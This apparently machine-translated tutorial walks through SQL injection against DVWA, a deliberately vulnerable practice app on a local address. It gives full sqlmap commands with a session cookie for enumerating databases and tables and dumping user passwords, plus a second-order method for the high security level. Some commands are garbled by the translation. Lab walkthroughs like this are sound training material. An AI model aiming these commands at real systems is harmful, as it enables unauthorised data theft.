Home > Article > Operation and Maintenance > Sample analysis of Sqlmap automated injection
Use sqlmap to automate injection of dvwa
Set the dvwa level to low
Open the SQL Injection of dvwa (SQL Injection (Blind) ), open browser debugging, enter user id and submit to view the intercepted requests.
You can see that it is a GET request, the url "http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
Let’s put it directly into salmap to test, use the -u command -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit# "
You can see that you need to log in here, otherwise you will not be able to escape. So we need to add a cookie to maintain login
6. Use burp suite proxy to capture packets, obtain the login cookie, add --dbs burst data -u "http:// 192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" -- cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" --dbs
You can see that the database that exploded is mysql
7. We use -D xxx to specify the database to be viewed, and use --tables to view all tables in the database: -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit= Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables
View the running results:
8. We use -D xxx -T ttt Specify the table to view, use --columns to view the columns of the table
-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID =0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns
9. We use -D xxx to view the database, -T xxx specifies the table to view, and -C xxx to view the columns of the table. -dump View column data
-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users -C password,user --dump
Adjust the dvwa security level to medium, save the captured data packets as a .txt file, and put In the sqlmap directory, directly -r file name --dbs (you can add subsequent parameters yourself)
Adjust the dvwa security level to high. Since the submission page this time is not the same page as the page that returns the results, the previous method cannot be used here. To use the second-level injection method
The URL to submit data
Returned URL
Save the captured data packet as a .txt file and put it in the directory of sqlmap Next, explode the database, command: -r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" -- batch -- level 2 --dbs
-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" - -batch --level 2 -D dvwa --tables
‐ "http://192.168.1.222:8089/vulnerabilities/sqli/"
-- batch --level 2 -D dvwa -T user --columns
Explode field data
-r 1.txt --second-url " http://192.168.1.222:8089/vulnerabilities/sqli/" -- batch --level 2 -D dvwa -T users -C user,password --dump
Some conceptual issues:
##Second-order injection: Second-order
level:Sqlmap has a total of 5 detection levels, the default is 1. The higher the level, the more payloads are used during detection. Among them, level 5 has the most payloads and will automatically crack and inject headers such as cookies and XFF. Of course, the higher the level, the slower the detection time. This parameter will affect the injection point of the test. GET and POST data will be tested. HTTP cookie will be tested when level is 2. HTTP User-Agent/Referer header will be tested when level is 3. When you are not sure which parameter is the injection point, in order to ensure accuracy, it is recommended to set level to 5 (the speed will also become slower)
The above is the detailed content of Sample analysis of Sqlmap automated injection. For more information, please follow other related articles on the PHP Chinese website!